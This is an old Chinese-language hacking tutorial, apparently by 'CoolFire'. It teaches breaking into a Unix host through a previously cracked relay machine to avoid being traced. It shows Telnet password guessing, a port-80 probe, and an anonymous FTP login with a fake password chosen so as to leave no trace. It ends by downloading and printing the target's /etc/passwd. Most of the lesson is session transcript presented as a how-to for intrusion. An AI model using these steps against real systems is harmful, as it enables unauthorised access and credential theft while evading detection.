进入主机有好几种方式, 可以经由 Telnet (Port 23) 或 SendMail (Port 25)
或 FTP 或 WWW (Port 80) 的方式进入, 一台主机虽然只有一个位址, 但是它可能
同时进行多项服务, 所以如果你只是要 "进入" 该主机, 这些 Port 都是很好的进
行方向. 当然还有很多 Port, 但是 DayTime 的 Port 你能拿它作甚麽??? 我不知
道, 你知道吗?!
底下的示范并不是像写出来的那麽容易, 只不过是要让你了解如何进入, 当然其
中还有很多问题, 如打错指令...... 等等的毛病... 没有出现在课堂上, 但是我为了
面子.... 一定要删掉这些不堪入目的东西嘛...
示范进入主机的方法: (By CoolFire)
(首先要先连上某一台你已经有帐号的 Telnet 主机, 当然最好是假的, 也就是 Crack
过的主机, 然後利用它来 Crack 别的主机, 才不会被别人以逆流法查出你的所在)
Digital UNIX (ms.hinet.net) (ttypa)
login: FakeName
Password:
Last login: Mon Dec 2 03:24:00 from 255.255.0.0
(我用的是 ms.hinet.net ... 当然是假的罗, 都已经经过修改了啦 !!
没有这一台主机啦 !! 别怕 ! 别怕 ! 以下的主机名称都是假的名
称, 请同学们要记得 !!)
Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996
Digital UNIX V1.2C Worksystem Software (Rev. 248)
Digital UNIX Chinese Support V1.2C (rev. 3)
(嗯... 进来了 ! 开始攻击吧 ! 本次的目标是......)
ms.hinet.net> telnet www.爱爱爱爱you.hinet.net (Telnet 试试看....)
Trying 111.222.255.255...
Connected to cool.爱爱爱爱you.hinet.net.
Escape character is '^]'.
Password:
Login incorrect
(没关系, 再来 !!)
cool login: hinet
Password:
Login incorrect
cool login:
(都没猜对, 这边用的是 猜 的方法, 今天运气好像不好)
telnet> close
Connection closed.
(重来, 换个 Port 试试看 !!)
ms.hinet.net> telnet 111.222.255.255 80
Trying 111.222.255.255...
Connected to 111.222.255.255.
Escape character is '^]'.
1<html>
2<head>
3<title>Error</title>
4</head>
5<body>
6<h1>Error 400</h1>
7
8Invalid request "" (unknown method)
9
10<p><hr/><address><a href="http://www.w3.org">CERN-HTTPD 3.0A</a></address>
11</p></body>
12</html>
Connection closed by foreign host.
(哇哩 !! 连密码都没得输入, 真是..... 再来 !! 要有恒心 !!)
(换 FTP Port 试试)
ms.hinet.net> ftp 111.222.255.255
Connected to 111.222.255.255.
220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
Name (111.222.255.255:FakeName): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user! This is an experimental FTP server. If have any
230-unusual problems, please report them via e-mail to [email protected]
230-If you do have problems, please try using a dash (-) as the first character
230-of your password -- this will turn off the continuation messages that may
230-be confusing your ftp client.
230-
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
(哇 ! 可以用 anonymous 进来耶!! password 部份输入 aaa@ 就好了 !
不要留下足迹喔!!)
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
etc
pub
usr
bin
lib
incoming
welcome.msg
226 Transfer complete.
(嗯嗯... 太好了 ! 进来了 !! 下一个目标是.....)
ftp> cd etc
250 CWD command successful.
ftp> get passwd (抓回来 !!)
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (566 bytes).
226 Transfer complete.
566 bytes received in 0.56 seconds (0.93 Kbytes/s)
(喔... 这麽容易吗??)
ftp> !cat passwd (看看 !!!)
root::0:0:root:/root:/bin/bash
bin::1:1:bin:/bin:
daemon::2:2:daemon:/sbin:
adm::3:4:adm:/var/adm:
lp::4:7:lp:/var/spool/lpd:
sync::5:0:sync:/sbin:/bin/sync
shutdown::6:0:shutdown:/sbin:/sbin/shutdown
halt::7:0:halt:/sbin:/sbin/halt
mail::8:12:mail:/var/spool/mail:
news::9:13:news:/var/spool/news:
uucp::10:14:uucp:/var/spool/uucp:
operator::11:0:operator:/root:/bin/bash
games::12:100:games:/usr/games:
man::13:15👨/usr/man:
postmaster::14:12:postmaster:/var/spool/mail:/bin/bash
ftp:*:404:1::/home/ftp:/bin/bash
(哇哩... 是 Shadow 的... 真是出师不利.... )